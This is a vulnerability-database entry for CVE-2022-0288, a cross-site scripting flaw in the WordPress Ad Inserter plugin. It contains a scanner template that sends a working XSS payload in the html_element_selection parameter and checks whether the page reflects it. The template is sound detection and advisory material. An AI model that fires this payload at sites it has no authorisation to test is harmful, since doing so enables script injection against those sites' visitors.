CVE-2022-0288: WordPress Ad Inserter <2.7.10 - Cross-Site Scripting

日期: 2025-08-01 | 影响软件: WordPress Ad Inserter | POC: 已公开

漏洞描述

WordPress Ad Inserter plugin before 2.7.10 contains a cross-site scripting vulnerability. It does not sanitize and escape the html_element_selection parameter before outputting it back in the page.

PoC代码[已公开]

id: CVE-2022-0288

info:
  name: WordPress Ad Inserter <2.7.10 - Cross-Site Scripting
  author: DhiyaneshDK
  severity: medium
  description: |
    WordPress Ad Inserter plugin before 2.7.10 contains a cross-site scripting vulnerability. It does not sanitize and escape the html_element_selection parameter before outputting it back in the page.
  impact: |
    Successful exploitation of this vulnerability could lead to cross-site scripting (XSS) attacks, allowing attackers to execute malicious scripts in the context of the victim's browser.
  remediation: Fixed in version 2.7.12
  reference:
    - https://wpscan.com/vulnerability/27b64412-33a4-462c-bc45-f81697e4fe42
    - https://nvd.nist.gov/vuln/detail/CVE-2022-0288
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-0288
    cwe-id: CWE-79
    epss-score: 0.0304
    epss-percentile: 0.86178
    cpe: cpe:2.3:a:ad_inserter_pro_project:ad_inserter_pro:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 1
    vendor: ad_inserter_pro_project
    product: ad_inserter_pro
    framework: wordpress
  tags: cve,cve2022,wordpress,xss,wpscan,ad_inserter_pro_project

http:
  - method: POST
    path:
      - "{{BaseURL}}"

    body: |
      html_element_selection=</script><img+src+onerror=alert(document.domain)>

    headers:
      Content-Type: "application/x-www-form-urlencoded"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "</script><img src onerror=alert(document.domain)>"
          - "ad-inserter"
        condition: and

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100ac4e9f2b9856828cc0c8c9ae8af2387f283a671edb858264ae3afc3f8244251e0220488906e95bc44caae1cd995093c354430755dd9e6df76445fe6ba748afb14867:922c64590222798bb761d5b6d8e72950